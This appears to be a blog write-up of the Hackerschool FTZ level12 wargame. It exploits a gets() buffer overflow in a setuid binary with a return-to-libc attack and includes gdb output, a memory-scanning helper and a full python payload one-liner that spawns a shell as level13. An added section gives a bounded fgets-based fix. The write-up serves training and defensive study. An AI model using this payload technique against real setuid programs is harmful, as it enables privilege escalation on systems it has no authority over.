pwn3r tistory



Hackerschool FTZ level12

pwn3r 2011.07.28 23:36

Category : System hacking

id : level12
pw : it is like this

Summary : buffer overflow on redhat 6.2

Connect to the server and check the challenge files.

[level12@ftz level12]$ ls -l
합계 28
-rwsr-x---    1 level13  level12     13771  3월  8  2003 attackme
-rw-r-----    1 root     level12       204  3월  8  2003 hint
drwxr-xr-x    2 root     level12      4096  2월 24  2002 public_html
drwxrwxr-x    2 root     level12      4096  7월 21 05:15 tmp
[level12@ftz level12]$ cat hint

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( void )
{
  char str[256];

  setreuid( 3093, 3093 );
  printf( "문장을 입력하세요.\n" );
  gets( str );
  printf( "%s\n", str );
}

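The hint file contains the source of a program called attackme.
The source shows that the call to gets introduces a buffer overflow vulnerability. attackme is owned by the level13 user and has the setuid bit set, so the overflow can be used to obtain a shell as level13.

This time the return address is overwritten with the address of the system function in the shared library, and the address of the string "/bin/sh" inside the shared library is passed as its argument.
First, collect the required information.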

0x08048473 <main+3>: sub    $0x108,%esp

The local variables occupy 264 bytes, so 268 bytes (including the sfp) must be filled to reach the return address.

(gdb) p system
$1 = {<text variable, no debug info>} 0x4005f430 <system>

Write and run a simple program that finds the string "/bin/sh" in the shared library.

[level12@ftz .pwn3r]$ cat whereisit.c
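#include <stdio.h>
#include <string.h>   /* memcmp */

int main()
{
 /* start at the address of system() found with gdb and scan upward */
 long addr = 0x4005f430;
 while(memcmp((void *)addr , "/bin/sh" , 7)) addr++;
 printf("0x%lx\n" , addr);
 return 0;
}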
[level12@ftz .pwn3r]$ gcc -o whereisit whereisit.c
[level12@ftz .pwn3r]$ ./whereisit

All the required information has been gathered, so run the attack.

[level12@ftz .pwn3r]$ (python -c 'print "a"*268 + "\x30\xf4\x05\x40" + "bbbb" + "\x24\xad\x14\x40"';cat) | ~/attackme
문장을 입력하세요.
uid=3093(level13) gid=3092(level12) groups=3092(level12)

Level13 Password is "have no clue".

A shell as the level13 user was obtained, along with the password.
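
The root cause in the hint source is the unbounded gets( str ) call. The following is an added example, not part of the original post or the challenge's code: a bounded replacement that rejects any line that does not fit the 256-byte buffer. The names read_line, try_input and the LINE_* codes are assumptions made for this example, and the 280-byte input is constructed filler with the same length as the input used above (268 + 4 + 4 + 4).

```c
#include <stdio.h>
#include <string.h>

enum { LINE_EOF = -1, LINE_TOO_LONG = -2 };

/* Bounded replacement for gets(str): writes at most cap bytes into buf.
 * Returns the line length, LINE_EOF, or LINE_TOO_LONG (line discarded). */
int read_line(FILE *in, char *buf, size_t cap)
{
    if (cap < 2 || fgets(buf, (int)cap, in) == NULL)
        return LINE_EOF;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {      /* whole line fit */
        buf[--n] = '\0';
        return (int)n;
    }
    int c = fgetc(in);                       /* what follows the chunk? */
    if (c == EOF || c == '\n')
        return (int)n;                       /* exactly cap-1 bytes, or EOF */
    while (c != '\n' && c != EOF)            /* drain the oversized line */
        c = fgetc(in);
    buf[0] = '\0';
    return LINE_TOO_LONG;
}

/* Constructed input: len filler bytes plus a newline, read into a
 * 256-byte buffer like str in the hint source. */
int try_input(size_t len)
{
    char str[256];
    FILE *f = tmpfile();
    if (f == NULL)
        return LINE_EOF;
    for (size_t i = 0; i < len; i++)
        fputc('a', f);
    fputc('\n', f);
    rewind(f);
    int rc = read_line(f, str, sizeof str);
    fclose(f);
    return rc;
}

int main(void)
{
    printf("255 bytes: %d\n", try_input(255));   /* fits the buffer */
    printf("280 bytes: %d\n", try_input(280));   /* rejected, nothing past str */
    return 0;
}
```

With this check in place the saved frame pointer and return address beyond str are never written, regardless of input length.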
